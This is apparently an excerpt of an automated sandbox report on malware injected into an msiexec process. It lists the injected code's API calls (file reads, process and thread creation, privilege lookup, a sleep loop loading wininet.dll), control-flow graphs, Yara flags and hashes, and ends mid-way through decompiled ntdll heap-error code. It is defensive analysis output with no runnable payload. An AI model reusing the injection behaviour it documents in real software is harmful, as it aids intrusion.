                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID: .z`
                              • API String ID: 823142352-1441809116
                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                              • Instruction ID: 0b35eb51e635469c2270232a434f4afd69ffceeb0f6e8250d2672d84e05849c8
                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                              • Instruction Fuzzy Hash: E8F0B2B2201208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630F811CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 458 ea869a-ea86e9 call ea91f0 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00EA3D82,5E972F65,FFFFFFFF,?,?,?,00EA3D82,?,A:,FFFFFFFF,5E972F65,00EA3D82,?,00000000), ref: 00EA86E5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:
                              • API String ID: 2738559852-1209300218
                              • Opcode ID: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                              • Instruction ID: dba95c03aa40c0dd8839701896ba6c0db80e7f40a0d55be3c0caf358780c6ffb
                              • Opcode Fuzzy Hash: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                              • Instruction Fuzzy Hash: 9AF0A4B2200109ABCB14DF99DC85EEB77ADAF8C754F158649BE1DA7251DA30E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 463 ea86a0-ea86e9 call ea91f0 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00EA3D82,5E972F65,FFFFFFFF,?,?,?,00EA3D82,?,A:,FFFFFFFF,5E972F65,00EA3D82,?,00000000), ref: 00EA86E5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:
                              • API String ID: 2738559852-1209300218
                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                              • Instruction ID: 5fd3406c129c6ea1a8f92b8e48f78058e1b6a28d5e41b2f3d24230aec9a0ed12
                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                              • Instruction Fuzzy Hash: 20F0A4B2200208ABCB14DF89DC85EEB77EDAF8C754F158249BE1DA7241D630E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 470 ea8720-ea8749 call ea91f0 NtClose
                              APIs
                              • NtClose.NTDLL(`=,?,?,00EA3D60,00000000,FFFFFFFF), ref: 00EA8745
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID: `=
                              • API String ID: 3535843008-694307575
                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                              • Instruction ID: d90feaf285dba45277fe62b321b6f53da394683b39dd7a49f8d40c5f15bdb861
                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                              • Instruction Fuzzy Hash: A8D01776200218ABD710EB98CC89EA77BACEF48760F154499BA18AB242C530FA0086E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
                              • Instruction ID: 00f3e1c2e6837de69e1660bdec39b919d366f00e9692fb672cc092014966969c
                              • Opcode Fuzzy Hash: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
                              • Instruction Fuzzy Hash: 4E9002A120200007650671594414626402BD7E4245B51C021E50055A1DC965D8D17175
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
                              • Instruction ID: 74783ead404c26a5a060f4dcd056f52327564153c8e9ecf88320a33247e6b5d0
                              • Opcode Fuzzy Hash: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
                              • Instruction Fuzzy Hash: 84900265211000072506A55907045170067D7D9395351C021F5006561CDA61D8E16171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
                              • Instruction ID: c1b9ca161d4ccfecd86a1e8536d179cfb34b7580754e8feb84c35172ccab61f1
                              • Opcode Fuzzy Hash: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
                              • Instruction Fuzzy Hash: 9990027120100847F50161594404B560026D7E4345F51C016A4115665D8A55D8D17571
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
                              • Instruction ID: d8adf06b165ffb72afd90bad414ece31c0c7ca0c7a7f6bfb1d9792be74fe888b
                              • Opcode Fuzzy Hash: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
                              • Instruction Fuzzy Hash: 4690027120108807F5116159840475A0026D7D4345F55C411A8415669D8AD5D8D17171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
                              • Instruction ID: 10755118722a2e3d5213c788cd90b96d36164c992c762abdc5c94ec74176c91c
                              • Opcode Fuzzy Hash: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
                              • Instruction Fuzzy Hash: 4D90027131114407F511615984047160026D7D5245F51C411A4815569D8AD5D8D17172
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
                              • Instruction ID: c3f7c06d942f6fa1c765aab8419422451e59b0cde29e12033910affab092733e
                              • Opcode Fuzzy Hash: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
                              • Instruction Fuzzy Hash: 3190026921300007F5817159540861A0026D7D5246F91D415A4006569CCD55D8E96371
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
                              • Instruction ID: 405ce9e05903a509f87b6b5bef32a93de508473e3a3440ffe6465f07eef14117
                              • Opcode Fuzzy Hash: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
                              • Instruction Fuzzy Hash: 7590027120100407F501659954086560026D7E4345F51D011A9015566ECAA5D8D17171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
                              • Instruction ID: 6dbbc1bde090bdf8b7e8a842120601c07f9cd1d6d3ff2ad988fe6beb003fbc7f
                              • Opcode Fuzzy Hash: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
                              • Instruction Fuzzy Hash: DF900261242041577946B15944045174027E7E4285791C012A5405961C8966E8D6E671
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
                              • Instruction ID: ecd16f8c2f7bce230b2782348d6c73f3ad40cbfa4e5e8f2c1169a1f8aa148745
                              • Opcode Fuzzy Hash: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
                              • Instruction Fuzzy Hash: 9390027120100417F51261594504717002AD7D4285F91C412A4415569D9A96D9D2B171
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
                              • Instruction ID: d294e41e0e80232f9b66d59f52d87a23cf6bf0d61883b3c0a87b2db262c56762
                              • Opcode Fuzzy Hash: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
                              • Instruction Fuzzy Hash: 5C9002A134100447F50161594414B160026D7E5345F51C015E5055565D8A59DCD27176
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
                              • Instruction ID: 62360b0bd933b0bfb8432f1b2ed6a2c1c6b37e2c27357c0785e89671665d5c43
                              • Opcode Fuzzy Hash: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
                              • Instruction Fuzzy Hash: D29002B120100407F541715944047560026D7D4345F51C011A9055565E8A99DDD576B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
                              • Instruction ID: 678e5ff29de4419d81ed4e8c58f397f997e24d9ee2ca0b6bec75fb2a486490cd
                              • Opcode Fuzzy Hash: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
                              • Instruction Fuzzy Hash: 6C90026121180047F60165694C14B170026D7D4347F51C115A4145565CCD55D8E16571
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 323 ea7310-ea733f 324 ea734b-ea7352 323->324 325 ea7346 call eaa030 323->325 326 ea7358-ea73a8 call eaa100 call e99b50 call ea3e60 324->326 327 ea742c-ea7432 324->327 325->324 334 ea73b0-ea73c1 Sleep 326->334 335 ea73c3-ea73c9 334->335 336 ea7426-ea742a 334->336 337 ea73cb-ea73f1 call ea6f40 335->337 338 ea73f3-ea7413 335->338 336->327 336->334 340 ea7419-ea741c 337->340 338->340 341 ea7414 call ea7140 338->341 340->336 341->340
                              APIs
                              • Sleep.KERNELBASE(000007D0), ref: 00EA73B8
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: net.dll$wininet.dll
                              • API String ID: 3472027048-1269752229
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 343 ea7306-ea7352 call eaa030 347 ea7358-ea73a8 call eaa100 call e99b50 call ea3e60 343->347 348 ea742c-ea7432 343->348 355 ea73b0-ea73c1 Sleep 347->355 356 ea73c3-ea73c9 355->356 357 ea7426-ea742a 355->357 358 ea73cb-ea73f1 call ea6f40 356->358 359 ea73f3-ea7413 356->359 357->348 357->355 361 ea7419-ea741c 358->361 359->361 362 ea7414 call ea7140 359->362 361->357 362->361
                              APIs
                              • Sleep.KERNELBASE(000007D0), ref: 00EA73B8
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: net.dll$wininet.dll
                              • API String ID: 3472027048-1269752229
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 467 ea8900-ea8931 call ea91f0 RtlFreeHeap
                              APIs
                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E93B93), ref: 00EA892D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID: .z`
                              • API String ID: 3298025750-1441809116
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E972EA
                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E9730B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID:
                              • API String ID: 1836367815-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E99BC2
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EA89C4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateInternalProcess
                              • String ID:
                              • API String ID: 2186235152-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E9CD00,?,?), ref: 00EA747C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E9CFD2,00E9CFD2,?,00000000,?,?), ref: 00EA8A90
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetErrorMode.KERNELBASE(00008003,?,?,00E97C93,?), ref: 00E9D46B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID:
                              • API String ID: 2340568224-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              • *** An Access Violation occurred in %ws:%s, xrefs: 04DBB48F
                              • *** Inpage error in %ws:%s, xrefs: 04DBB418
                              • The instruction at %p tried to %s , xrefs: 04DBB4B6
                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04DBB323
                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04DBB47D
                              • *** Resource timeout (%p) in %ws:%s, xrefs: 04DBB352
                              • <unknown>, xrefs: 04DBB27E, 04DBB2D1, 04DBB350, 04DBB399, 04DBB417, 04DBB48E
                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04DBB3D6
                              • The resource is owned shared by %d threads, xrefs: 04DBB37E
                              • read from, xrefs: 04DBB4AD, 04DBB4B2
                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04DBB305
                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04DBB39B
                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04DBB2DC
                              • Go determine why that thread has not released the critical section., xrefs: 04DBB3C5
                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04DBB476
                              • an invalid address, %p, xrefs: 04DBB4CF
                              • a NULL pointer, xrefs: 04DBB4E0
                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04DBB2F3
                              • write to, xrefs: 04DBB4A6
                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04DBB38F
                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04DBB484
                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04DBB53F
                              • *** then kb to get the faulting stack, xrefs: 04DBB51C
                              • *** enter .cxr %p for the context, xrefs: 04DBB50D
                              • The critical section is owned by thread %p., xrefs: 04DBB3B9
                              • *** enter .exr %p for the exception record, xrefs: 04DBB4F1
                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04DBB314
                              • The resource is owned exclusively by thread %p, xrefs: 04DBB374
                              • The instruction at %p referenced memory at %p., xrefs: 04DBB432
                              • This failed because of error %Ix., xrefs: 04DBB446
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                              • API String ID: 0-108210295
                              • Opcode ID: 3c63c90b91982bbcba54d4872e5704ec8e48cce95b1f3f8a0a8fdc3607ed2c50
                              • Instruction ID: 02c95c867868287dcd41dde3dbb892e87cafa40dc1d4018ca80a036e2cee084a
                              • Opcode Fuzzy Hash: 3c63c90b91982bbcba54d4872e5704ec8e48cce95b1f3f8a0a8fdc3607ed2c50
                              • Instruction Fuzzy Hash: 2E813432B00200FFEF265E05DC45EAB3B67FF46759B404066F2475B612E269B901DAB2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 44%
                              			E04DC1C06() {
                              				signed int _t27;
                              				char* _t104;
                              				char* _t105;
                              				intOrPtr _t113;
                              				intOrPtr _t115;
                              				intOrPtr _t117;
                              				intOrPtr _t119;
                              				intOrPtr _t120;
                              
                              				_t105 = 0x4ce48a4;
                              				_t104 = "HEAP: ";
                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              					_push(_t104);
                              					E04D0B150();
                              				} else {
                              					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              				}
                              				_push( *0x4df589c);
                              				E04D0B150("Heap error detected at %p (heap handle %p)\n",  *0x4df58a0);
                              				_t27 =  *0x4df5898; // 0x0
                              				if(_t27 <= 0xf) {
                              					switch( *((intOrPtr*)(_t27 * 4 +  &M04DC1E96))) {
                              						case 0:
                              							_t105 = "heap_failure_internal";
                              							goto L21;
                              						case 1:
                              							goto L21;
                              						case 2:
                              							goto L21;
                              						case 3:
                              							goto L21;
                              						case 4:
                              							goto L21;
                              						case 5:
                              							goto L21;
                              						case 6:
                              							goto L21;
                              						case 7:
                              							goto L21;
                              						case 8:
